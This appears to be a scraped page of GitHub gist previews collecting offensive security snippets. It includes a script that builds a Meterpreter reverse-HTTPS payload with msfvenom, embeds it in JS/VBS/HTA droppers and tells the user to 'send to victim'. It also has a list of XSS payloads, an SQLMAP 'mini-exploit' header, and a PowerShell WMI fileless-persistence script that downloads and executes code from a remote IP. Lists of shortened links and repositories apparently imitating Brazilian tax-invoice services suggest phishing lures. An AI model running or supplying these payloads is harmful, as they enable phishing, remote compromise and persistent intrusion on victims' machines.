IDA Plugins | Preferred | Neutral | Unreviewed |
---|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
MINI-EXPLOIT // SQLMAP ~ | |
------------------------------------------------------ | |
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL | |
[+] EMAIL: [email protected] | |
[+] Blog: http://blog.inurl.com.br | |
[+] Twitter: https://twitter.com/googleinurl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
E d i ç ã o - 2.0 / 29-09-2015 | |
-------------------------------------------------------------------------------- | |
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL | |
[+] Blog: http://blog.inurl.com.br | |
-------------------------------------------------------------------------------- | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://bit.ly/1JNxVpN | |
http://bit.ly/1JHuoVh | |
http://bit.ly/1KdqJTQ | |
http://bit.ly/1kb9tuL | |
http://bit.ly/1JyLGX3 | |
http://bit.ly/1jwS2fm | |
http://bit.ly/1jsQx0A | |
http://bit.ly/1KmT2K1 | |
http://bit.ly/1kjulai | |
http://bit.ly/1kJ33cb |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://github.com/helio12ferreira22/casd12 | |
https://github.com/helio12ferreira22/fdt4785 | |
https://github.com/helio12ferreira22/NF2017 | |
https://github.com/helio12ferreira22/arquivo-solicitado | |
https://github.com/helio12ferreira22/12 | |
https://github.com/helio12ferreira22/sistemasefaz | |
https://github.com/emissaosefaz/atendimento.github.io | |
https://github.com/emissaosefaz/NE-fiscal | |
https://github.com/emissaosefaz/certbot | |
https://github.com/emissaosefaz/tests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
PAYLOAD=$(cat payload.bin | base64 -w 0) | |
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
service apache2 start | |
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body oninput=javascript:alert(1)><input autofocus> | |
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> | |
<frameset onload=javascript:alert(1)> | |
<table background="javascript:javascript:alert(1)"> | |
<!--<img src="--><img src=x onerror=javascript:alert(1)//"> | |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> | |
<![><img src="]><img src=x onerror=javascript:alert(1)//"> | |
<style><img src="</style><img src=x onerror=javascript:alert(1)//"> | |
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> | |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work. | |
#> | |
function Install-Persistence{ | |
$Payload = "((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))" | |
$EventFilterName = 'Cleanup' | |
$EventConsumerName = 'DataCleanup' | |
$finalPayload = "powershell.exe -nop -c `"IEX $Payload`"" |
OlderNewer